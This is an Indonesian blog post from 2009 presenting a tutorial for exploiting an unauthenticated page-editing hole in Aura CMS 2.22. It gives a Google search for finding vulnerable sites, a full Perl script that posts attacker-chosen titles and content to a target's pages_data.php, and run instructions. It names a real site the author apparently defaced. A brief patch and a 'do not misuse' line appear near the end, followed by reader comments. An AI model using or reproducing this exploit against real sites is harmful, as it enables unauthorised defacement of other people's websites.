Bugs Pada Aura CMS | Exploit Using Perl

wuiih.. lama saya ga posting artikel mengenai dunia yang di cap “hitam” alias “underwear” ( Baca : Gelap ). :B

ya, pada kesempatan kali ini saya akan memberikan info mengenai sebuah tekhnik exploit yang dapat digunakan terhadap Aura CMS. tepatnya pada file pages_data.php, ( bug ini udah ada cukup lama lo, sekitar agustus tahun lalu )

CMS karya anak bangsa ini ternyata juga tidak terhindar dari yang namanya “bugs”. wuiih.. ngeri ah, punya saudara sendiri kok di “Exploit” ? >:<

Tenang sahabat, disini saya cuma memberikan info aja kok, dan juga pada artikel ini juga akan dibahas bagaimana untuk mem”patch” bug tersebut, jadi tenang aja buat para sahabat blogger yang kebetulan menggunakan Aura CMS, malah kalian harus bangga lo, menggunakan produk dalam negeri. >U

Ya, mari kita memancing, sebelumnya kita harus caru cacingnya dulu ( baca : umpan ) :D

- ketik di google Powered By AuraCMS 2.22

- buka file pages_data.php nya, caranya ketik di address bar seperti ini :

http//www.target.com/js/pages/pages_data.php

ganti yang warna merah sesuai target yang didapat

- bila sitenya sudah di patch akan keluar kata-kata berikut

You Must Login First If Not Yet Have Account Please Register

- bila belum, biasanya kosong dan ada tulisan

{”pages”:[{"id":"1","judul":"blablabla"},{"id":"2","judul":"blablabla"},{"id":"3","blablabla":"blablabla"},{"id":"4","judul":"blablabla"},{"id":"5","judul":"blablabla"}],”pagging”:”"}

Kira-kira seperti itu,

- Selanjutanya siapkan sebuah script perl untuk exploitasinya, Oya sebelumnya bagi yang kompie-nya belum terinstall perl, bisa di donwload dulu disini >> CLICK HERE

berikut contoh script perl yang dibutuhkan :

use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

my $isijudul = “ISI JUDUL”;
my $isikonten = “Isi Konten”;
my $ambilkue = “http://situstarget.com/index.php”;
my $kue = HTTP::Cookies->new();
my $hasil = “”;
my $browser = LWP::UserAgent->new;

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;

$hasil = $browser->get($arbitrary);

$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);

$arbitrary .= “1″;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;

waw, kok ada smiley nya ?? tenang, ga pengaruh kok tinggal copy paste aja. :D.

berikut sedikit penjelasannya :

my $isijudul = “ISI JUDUL”;    >> ganti dengan judul yang sahabat inginkan

my $isikonten = “Isi Konten”; >>  Ganti dengan konten yang sahabat inginkan juga,

my $ambilkue = “http://situstarget.com/index.php”; >>   Ganti http://situstarget.com dengan situs asli target sahabat tadi.

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;      >> Ganti HANYA http://situstarget.com saja !, sesuai target sahabat.

- Copy script diatas dan save dengan extensi .pl, lalu simpan di direktori yang mudah di ingat, ini hanya untuk mempermudah step selanjutnya.  >> contoh :    C:aura.pl

- buka command prompt, sebelumnya ketik perl -v untuk mengecek, apakah perl yang di download tadi sudah terinstall sebagaimana mestinya. Jika sudah terinstall akan keluar versi dari installer perl tersebut. :-)

- masuk ke direktori file aura.pl tadi ( udah tau kan caranya ? ),  misal ada di dir C, ketik aza   >>  cd C:

- jalankan file aura.pl tadi. caranya ketik >>   C:aura.pl

- lihat hasilnya, ……… Tara….!!, gimana sobat, berhasil kan ?, for example : http://www.pkpujogja.or.id/, ( maaf buat adminnya :D )

Ya, sekarang adalah bagaimana car mem-”patch” ( baca : tutup ) bug tersebut.

huff… setelah googling cukup lama, akhirnya dapat juga…

if(!cek_login()){

echo “Maaf anda tidak diperkenankan mengakses halaman ini”;

}else{

if (session_is_registered (’LevelAkses’) && $_SESSION['LevelAkses']==”Administrator”){


copy potongan script tersebut dan paste diatas code switch (@$_GET['action']){ pada file pages_data.php

lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.

sekian sahabat, info dari saya kali ini, semoga bermanfaat, dan ingat, jangan disalahgunakan yah :O)

Thanks, Teatzo

Posted: April 24th, 2009
Categories: CMS, Hack, News & Info, Tutorial
Tags:
Comments: 6 Comments.
Comments
Comment from nyubi - April 24, 2009 at 7:30 pm

wew, liatt postingan sob, saia mesti sering2 nih, mampir lah kesini, abizz artikelnya gag cuma membahas dunia terang dunia underwear aza dikupas habiss, sip, meluncur ke google,,,,coba akh,,,,,:>U

Comment from Teatzo - April 24, 2009 at 10:51 pm

jiakak :D) malah dianggep serius boz..
selamat mencoba, semoga sukses N makasih atas kunjungannya :-)

Comment from 3797 - April 28, 2009 at 6:52 pm

wii.. kerenn :qp:
btw, ada beberapa tulisan yg keganti sm emotion y..:))

Comment from Teatzo - May 13, 2009 at 6:36 pm

@3797
makasih bro atas komentar dan kunjunfgannya :D

Comment from Faris - May 25, 2009 at 10:39 am

Keyen sob… :>U

Saya juga ada videonya.. http://farisblog.com/JokerKliker/Video1.rar

Tapi jelek videonya… maklum nubie… :-(

Comment from dede - November 17, 2009 at 4:53 pm

berkunjung yo.. mantap artikelnya http://situstarget.com

gaBung dif forum ane jgn lupa http://whitehathacker.tk

Write a comment